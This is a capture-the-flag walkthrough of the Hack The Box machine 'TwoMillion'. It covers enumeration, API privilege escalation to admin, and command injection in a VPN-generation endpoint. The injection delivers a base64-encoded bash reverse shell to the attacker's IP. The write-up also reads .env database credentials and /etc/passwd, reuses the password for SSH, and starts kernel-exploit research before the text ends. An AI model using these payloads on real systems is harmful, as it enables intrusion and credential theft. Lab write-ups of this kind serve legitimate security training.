TwoMillion
#easy #linux #commandinjection
https://app.hackthebox.com/machines/TwoMillion
Enumeration
sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.11.221 -oA openPortsPORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63cat openPorts.nmap | grep -oP '^[0-9]{1,5}' | tr '\n' ',' | sed 's/,$//'nmap -p 22,80 -n -Pn -sCV 10.10.11.221 -oA targetedPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelecho '10.10.11.221 2million.htb' | sudo tee -a /etc/hosts
https://lelinhtinh.github.io/de4js/
function verifyInviteCode(code) {
var formData = {
"code": code
};
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function (response) {
console.log(response)
},
error: function (response) {
console.log(response)
}
})
}
function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/how/to/generate',
success: function (response) {
console.log(response)
},
error: function (response) {
console.log(response)
}
})
}curl -s -X POST http://2million.htb/api/v1/invite/how/to/generate | jq{
"0": 200,
"success": 1,
"data": {
"data": "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr",
"enctype": "ROT13"
},
"hint": "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."
}echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr' | tr 'A-Za-z' 'N-ZA-Mn-za-m'In order to generate the invite code, make a POST request to /api/v1/invite/generatecurl -s -X POST http://2million.htb/api/v1/invite/generate | jq{
"0": 200,
"success": 1,
"data": {
"code": "MkxP************************TTA=",
"format": "encoded"
}
}echo 'MkxP************************TTA=' | base64 -d2LO*****************XM0
http://2million.htb/home/access
Click on Connection Pack
Intercept with Burpsuite
curl -v 2million.htb/api* Host 2million.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.221
* Trying 10.10.11.221:80...
* Connected to 2million.htb (10.10.11.221) port 80
* using HTTP/1.x
> GET /api HTTP/1.1
> Host: 2million.htb
> User-Agent: curl/8.14.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 401 Unauthorized
< Server: nginx
< Date: Tue, 24 Jun 2025 03:19:12 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=s624h3a4mgdn46acip7eporm9f; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
<
* Connection #0 to host 2million.htb left intactcurl -sv 2million.htb/api --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq{
"/api/v1": "Version 1 of the API"
}curl -s 2million.htb/api/v1 --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq{
"v1": {
"user": {
"GET": {
"/api/v1": "Route List",
"/api/v1/invite/how/to/generate": "Instructions on invite code generation",
"/api/v1/invite/generate": "Generate invite code",
"/api/v1/invite/verify": "Verify invite code",
"/api/v1/user/auth": "Check if user is authenticated",
"/api/v1/user/vpn/generate": "Generate a new VPN configuration",
"/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
"/api/v1/user/vpn/download": "Download OVPN file"
},
"POST": {
"/api/v1/user/register": "Register a new user",
"/api/v1/user/login": "Login with existing user"
}
},
"admin": {
"GET": {
"/api/v1/admin/auth": "Check if user is admin"
},
"POST": {
"/api/v1/admin/vpn/generate": "Generate VPN for specific user"
},
"PUT": {
"/api/v1/admin/settings/update": "Update user settings"
}
}
}
}curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq{
"status": "danger",
"message": "Invalid content type."
}curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' | jq{
"status": "danger",
"message": "Missing parameter: email"
}curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com"}' | jq{
"status": "danger",
"message": "Missing parameter: is_admin"
}curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com", "is_admin": true}' | jq{
"status": "danger",
"message": "Variable is_admin needs to be either 0 or 1."
}curl -s -X PUT 2million.htb/api/v1/admin/settings/update --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' -H 'Content-Type: application/json' --data '{"email": "sandia@sandia.com", "is_admin": 1}' | jq{
"id": 16,
"username": "sandia",
"is_admin": 1
}curl -s 2million.htb/api/v1/admin/auth --cookie 'PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s' | jq{
"message": true
}curl -sX POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" | jq{
"status": "danger",
"message": "Missing parameter: username"
}curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username": "sandia"}'client
dev tun
proto udp
remote edge-eu-free-1.2million.htb 1337
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
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
2iX/ag==
-----END CERTIFICATE-----
</ca>
<cert>
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=UK, ST=London, L=London, O=HackTheBox, OU=VPN, CN=2million/emailAddress=info@hackthebox.eu
Validity
Not Before: Jun 26 23:29:13 2025 GMT
Not After : Jun 26 23:29:13 2026 GMT
Subject: C=GB, ST=London, L=London, O=sandia, CN=sandia
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:b3:36:70:80:ac:61:59:c2:ff:93:f2:ad:39:9a:
04:b7:8e:54:9e:45:ef:c4:86:f2:99:87:a4:65:2d:
56:32:4f:06:e8:7e:2c:6c:e0:67:eb:9e:da:ed:c8:
0c:33:bf:aa:e9:eb:cc:8f:3a:36:9e:e3:77:82:ba:
9a:23:c0:18:41:4b:a2:92:1d:5b:fe:69:8e:b1:59:
6c:62:1d:33:cb:7d:f8:09:f3:a3:93:8e:ba:d2:e0:
25:59:e0:56:66:ef:a7:21:85:df:ea:89:4c:3b:32:
eb:54:21:a9:92:1a:9d:23:bb:e1:07:e5:0a:57:6c:
46:30:18:54:6b:ab:1a:75:86:aa:c1:70:40:61:d8:
b5:89:db:66:d5:65:f6:b1:b6:0d:1c:16:42:24:41:
3c:aa:e4:ed:aa:ff:15:ea:f9:42:81:a3:79:20:6d:
45:21:4d:38:d4:5b:7e:d9:55:54:fa:09:9d:5c:0f:
e4:84:b3:62:62:87:c0:6a:41:1d:f2:b3:14:ab:c1:
48:32:14:64:ab:0f:da:c1:ea:21:ca:cf:61:7f:fd:
53:71:31:f8:25:0e:76:ff:04:0b:56:e5:64:95:d1:
54:2a:a4:3d:67:78:bd:e7:a5:6c:0a:4b:71:55:e7:
2e:60:a7:b3:92:53:bb:03:eb:59:93:80:6e:1c:78:
6f:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
7E:E2:EE:57:C4:3A:32:0F:F5:E0:90:5E:AA:62:B1:48:AB:DE:F6:9D
X509v3 Authority Key Identifier:
7A:62:DD:1D:B6:FE:4A:C8:E3:F8:9F:FA:AC:F4:15:0C:96:BA:2E:91
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
Netscape Comment:
OpenSSL Generated Certificate
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
9f:d5:b2:28:ec:b0:18:af:15:c5:cf:26:96:68:2d:8c:a4:96:
fe:18:31:53:71:19:c6:c7:69:01:8d:11:b5:33:e4:1c:bc:e3:
4a:39:90:6e:43:b4:7a:da:c6:aa:7e:33:b5:9b:f5:0e:92:b7:
d7:83:27:e2:eb:cb:9c:81:24:a0:81:72:4e:27:a9:47:9a:cc:
f7:b8:47:de:83:2e:b0:df:b8:a7:f4:cd:90:3a:ba:d8:a7:25:
4d:fe:7b:0d:08:96:18:ba:48:1c:2c:d0:ba:18:af:8f:34:ee:
93:8a:a3:c3:a3:8e:f0:66:60:46:56:a6:6e:a9:ec:da:4a:4c:
58:c2:2e:26:ff:17:33:e1:2d:6f:09:04:d7:2f:92:7e:7b:66:
be:ab:f9:32:21:a3:55:56:42:4c:7d:11:63:89:e7:3f:ec:2a:
ff:95:60:c0:e8:9b:59:2e:7f:6b:f9:4a:ee:2a:8d:77:80:e0:
bc:13:7a:04:40:44:48:3e:29:bb:82:fa:0d:f4:88:c8:f0:8a:
e6:ca:cd:91:ea:5d:58:64:ee:8b:93:fe:27:cd:b0:0b:2d:e4:
d5:d2:56:7b:6d:60:a2:6b:ca:80:47:6b:27:d9:c0:e1:5f:60:
de:2a:fa:ae:d9:73:e4:11:26:5a:3a:9a:8d:7c:28:1c:79:d9:
0a:4e:74:2b:59:cd:a7:78:b0:b6:40:33:b8:65:4c:86:09:2a:
66:23:e7:d5:78:2f:dc:bf:dd:3f:51:df:4a:8b:dd:59:2b:ab:
a4:7a:ac:d4:44:82:0e:61:58:a7:15:88:cb:74:aa:d5:19:ae:
87:45:70:09:27:be:6c:05:d4:2b:ae:dc:7a:f5:5d:6b:82:f6:
4a:fd:fb:b1:3b:f9:cc:f5:0c:1d:ce:d2:6f:c5:ba:b0:4f:66:
c8:82:49:c3:99:ba:ac:b9:85:5c:4d:37:7f:41:a3:8a:60:01:
12:4f:3a:95:9c:a6:0b:67:be:a9:0b:f1:a8:b2:b7:8f:e1:82:
b3:08:f2:8c:fe:cb:fe:b0:47:3a:49:db:40:a8:50:bc:b4:33:
ed:90:47:7d:fb:e9:d0:cf:4d:3f:ed:70:b6:14:8d:58:57:ac:
32:28:0b:e7:72:01:01:c7:14:6c:aa:ad:c4:8a:dd:6d:66:fc:
d8:04:db:b7:4a:4b:66:4a:21:12:7a:be:0e:26:3b:cb:e0:0f:
97:c5:e4:ae:9d:59:9e:b9:7c:e4:fa:86:7d:e1:71:66:51:73:
bc:ad:38:a4:67:e7:14:4e:b4:e6:3a:3c:fe:f0:35:48:6e:ed:
12:49:67:f9:13:49:5f:dd:89:27:ac:25:49:b1:27:33:e0:67:
f8:3b:c9:40:72:9e:e7:8f
-----BEGIN CERTIFICATE-----
MIIE3zCCAsegAwIBAgIBATANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVUsx
DzANBgNVBAgMBkxvbmRvbjEPMA0GA1UEBwwGTG9uZG9uMRMwEQYDVQQKDApIYWNr
VGhlQm94MQwwCgYDVQQLDANWUE4xETAPBgNVBAMMCDJtaWxsaW9uMSEwHwYJKoZI
hvcNAQkBFhJpbmZvQGhhY2t0aGVib3guZXUwHhcNMjUwNjI2MjMyOTEzWhcNMjYw
NjI2MjMyOTEzWjBRMQswCQYDVQQGEwJHQjEPMA0GA1UECAwGTG9uZG9uMQ8wDQYD
VQQHDAZMb25kb24xDzANBgNVBAoMBnNhbmRpYTEPMA0GA1UEAwwGc2FuZGlhMIIB
IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAszZwgKxhWcL/k/KtOZoEt45U
nkXvxIbymYekZS1WMk8G6H4sbOBn657a7cgMM7+q6evMjzo2nuN3grqaI8AYQUui
kh1b/mmOsVlsYh0zy334CfOjk4660uAlWeBWZu+nIYXf6olMOzLrVCGpkhqdI7vh
B+UKV2xGMBhUa6sadYaqwXBAYdi1idtm1WX2sbYNHBZCJEE8quTtqv8V6vlCgaN5
IG1FIU041Ft+2VVU+gmdXA/khLNiYofAakEd8rMUq8FIMhRkqw/aweohys9hf/1T
cTH4JQ52/wQLVuVkldFUKqQ9Z3i956VsCktxVecuYKezklO7A+tZk4BuHHhvsQID
AQABo4GJMIGGMB0GA1UdDgQWBBR+4u5XxDoyD/XgkF6qYrFIq972nTAfBgNVHSME
GDAWgBR6Yt0dtv5KyOP4n/qs9BUMlroukTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIB
/jAsBglghkgBhvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUw
DQYJKoZIhvcNAQELBQADggIBAJ/VsijssBivFcXPJpZoLYyklv4YMVNxGcbHaQGN
EbUz5By840o5kG5DtHraxqp+M7Wb9Q6St9eDJ+Lry5yBJKCBck4nqUeazPe4R96D
LrDfuKf0zZA6utinJU3+ew0Ilhi6SBws0LoYr4807pOKo8OjjvBmYEZWpm6p7NpK
TFjCLib/FzPhLW8JBNcvkn57Zr6r+TIho1VWQkx9EWOJ5z/sKv+VYMDom1kuf2v5
Su4qjXeA4LwTegRAREg+KbuC+g30iMjwiubKzZHqXVhk7ouT/ifNsAst5NXSVntt
YKJryoBHayfZwOFfYN4q+q7Zc+QRJlo6mo18KBx52QpOdCtZzad4sLZAM7hlTIYJ
KmYj59V4L9y/3T9R30qL3Vkrq6R6rNREgg5hWKcViMt0qtUZrodFcAknvmwF1Cuu
3Hr1XWuC9kr9+7E7+cz1DB3O0m/FurBPZsiCScOZuqy5hVxNN39Bo4pgARJPOpWc
pgtnvqkL8aiyt4/hgrMI8oz+y/6wRzpJ20CoULy0M+2QR3376dDPTT/tcLYUjVhX
rDIoC+dyAQHHFGyqrcSK3W1m/NgE27dKS2ZKIRJ6vg4mO8vgD5fF5K6dWZ65fOT6
hn3hcWZRc7ytOKRn5xROtOY6PP7wNUhu7RJJZ/kTSV/diSesJUmxJzPgZ/g7yUBy
nueP
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MIIEuQIBADANBgkqhkiG9w0BAQEFAASCBKMwggSfAgEAAoIBAQCzNnCArGFZwv+T
8q05mgS3jlSeRe/EhvKZh6RlLVYyTwbofixs4GfrntrtyAwzv6rp68yPOjae43eC
upojwBhBS6KSHVv+aY6xWWxiHTPLffgJ86OTjrrS4CVZ4FZm76chhd/qiUw7MutU
IamSGp0ju+EH5QpXbEYwGFRrqxp1hqrBcEBh2LWJ22bVZfaxtg0cFkIkQTyq5O2q
/xXq+UKBo3kgbUUhTTjUW37ZVVT6CZ1cD+SEs2Jih8BqQR3ysxSrwUgyFGSrD9rB
6iHKz2F//VNxMfglDnb/BAtW5WSV0VQqpD1neL3npWwKS3FV5y5gp7OSU7sD61mT
gG4ceG+xAgMBAAECgf4njy8C49A2sgjRbwyvcSGZ/MkhbsEUftzsOv0r2rBOTlTH
akshhbXUAP1OasEAWan+A7JAfI9xM6MLUoxfYXcy+ms1vbR1Zz9HpQnos4JcV6MN
zn0qqvUHULDgCq3FCxCU6TC5EVjTcuCV9U8Y9NQR7GfRL5RKkPIyxmdb2c0JHcEE
cx1J/SfbJs0x10ZuIF/2raLCGMMW4n155LvI8/KQbLGfhBhgnd7u2buKHy6v6SPg
BA2dOilotX6T7Ec1nWtBlyo9kQHLYx2czjYDd00mX9u07JnUwcosgKXn5c+lxYHs
Zp0pJcu5xTz03ZyCSlgBCuQVyodSJVUi2e1gqQKBgQDiSnvAHRvkNYAbFZ5q30Ey
DYSpYH9/dEtUAVxmbj2Ut0SoZGwx6webJCms3bhRpIDVEypYYRPvXJR0XWYXL8sV
YINZ9wSYWujFCgEpBOOuAOZSV0T33I7C/8O3GRZr5vzyowlPn81t8pgUALyC9zyq
Zs0GJ8XYony9h9VMnaYJ1QKBgQDKva4RE9Hi5O80XtVx8XRV0o5tRhE5ACDZQfTT
MwgvLIwfyYCJ2fVG7IxV43st2SNVgumjftePrLY0rjWWBbuSXsEYqgg6TcfQbCv8
ZztRxnOStt5edXXT8OzR2mumCBjFih1yzld8L8WQI+mtcB2f3KRJwVt1in1I9Cyh
0I1AbQKBgFPIsiMCZBZNvL3KdlopiREIMksoIGzHWTCkRFrkjEZoyLH0ZJ7i33EQ
paGMgjcwSkcaDn6kiuYACDNBdZA2MOIcVuXTcM8cMbzqpF1UoxwE10I7b5y5+921
Jvi/AC85WgRYWxUxHLWNscMONr3i3oJVB6o0xasdFkRya4YvhI91AoGATgTYa3H5
HxuCgeDMuuB0KGKytJJ2Jj1KZtDe6jeFOsIl2kWs1V+u5/A3wQWdbXNWCZ4rUuOJ
CJ0qMPOpY2YpXJZiMJ+eMvGjpy05cBQ526pG53q/8BG7mifouokXS/lprvsLghat
y/iGSoXHcxrmC5LZFhj2nTECLYTpeAvNj7ECgYA6na+ghwGFYWwD9lEodx6O2GRf
wWKRsFs5a63fnrJwp5OYuBDcITzBRAFH1hDPQQNs5tGzGQouR2KWI2FMyiScGhNy
Z2w7N5ENPbC1QL9SRVBfW4LA8DD3JvsggPkX8ifx5T4Kjw2FD5FYHQgHpONsJYbr
TDNkGtyH7W1g7DD2jg==
-----END PRIVATE KEY-----
</key>
<tls-auth>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
45df64cdd950c711636abdb1f78c058c
358730b4f3bcb119b03e43c46a856444
05e96eaed55755e3eef41cd21538d041
079c0fc8312517d851195139eceb458b
f8ff28ba7d46ef9ce65f13e0e259e5e3
068a47535cd80980483a64d16b7d10ca
574bb34c7ad1490ca61d1f45e5987e26
7952930b85327879cc0333bb96999abe
2d30e4b592890149836d0f1eacd2cb8c
a67776f332ec962bc22051deb9a94a78
2b51bafe2da61c3dc68bbdd39fa35633
e511535e57174665a2495df74f186a83
479944660ba924c91dd9b00f61bc09f5
2fe7039aa114309111580bc5c910b4ac
c9efb55a3f0853e4b6244e3939972ff6
bfd36c19a809981c06a91882b6800549
-----END OpenVPN Static key V1-----
</tls-auth>Command Injection
curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username":"sandia; whoami;"}'www-dataecho 'bash -i >& /dev/tcp/10.10.15.113/1111 0>&1' | base64YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg==nc -lnvp 1111curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username":"sandia; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg== | base64 -d | bash;"}'listening on [any] 1111 ...
connect to [10.10.15.113] from (UNKNOWN) [10.10.11.221] 39258
bash: cannot set terminal process group (1194): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2million:~/html$ ls -la
total 56
drwxr-xr-x 10 root root 4096 Jun 26 23:40 .
drwxr-xr-x 3 root root 4096 Jun 6 2023 ..
-rw-r--r-- 1 root root 87 Jun 2 2023 .env
-rw-r--r-- 1 root root 1237 Jun 2 2023 Database.php
-rw-r--r-- 1 root root 2787 Jun 2 2023 Router.php
drwxr-xr-x 5 root root 4096 Jun 26 23:40 VPN
drwxr-xr-x 2 root root 4096 Jun 6 2023 assets
drwxr-xr-x 2 root root 4096 Jun 6 2023 controllers
drwxr-xr-x 5 root root 4096 Jun 6 2023 css
drwxr-xr-x 2 root root 4096 Jun 6 2023 fonts
drwxr-xr-x 2 root root 4096 Jun 6 2023 images
-rw-r--r-- 1 root root 2692 Jun 2 2023 index.php
drwxr-xr-x 3 root root 4096 Jun 6 2023 js
drwxr-xr-x 2 root root 4096 Jun 6 2023 views
www-data@2million:~/html$ cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=Su***********s123
www-data@2million:~/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000::/home/admin:/bin/bash
memcache:x:115:121:Memcached,,,:/nonexistent:/bin/false
_laurel:x:998:998::/var/log/laurel:/bin/falsessh admin@10.10.11.221
The authenticity of host '10.10.11.221 (10.10.11.221)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.221' (ED25519) to the list of known hosts.
admin@10.10.11.221's password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jun 26 11:45:02 PM UTC 2025
System load: 0.0
Usage of /: 74.8% of 4.82GB
Memory usage: 9%
Swap usage: 0%
Processes: 231
Users logged in: 0
IPv4 address for eth0: 10.10.11.221
IPv6 address for eth0: dead:beef::250:56ff:feb0:3f25
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have mail.
Last login: Thu Jun 26 22:22:04 2025 from 10.10.14.204
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@2million:~$ ls
user.txt
admin@2million:~$ cat user.txt
70df************************ce41Privilege Escalation
admin@2million:~$ ls -la /var/mail/
total 12
drwxrwsr-x 2 root mail 4096 Jun 2 2023 .
drwxr-xr-x 14 root root 4096 Jun 6 2023 ..
-rw-r--r-- 1 admin admin 540 Jun 2 2023 admin
admin@2million:~$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB GodfatherGoogle search OverlayFS FUSE linux kernel
https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/
admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.2 LTS
Release: 22.04
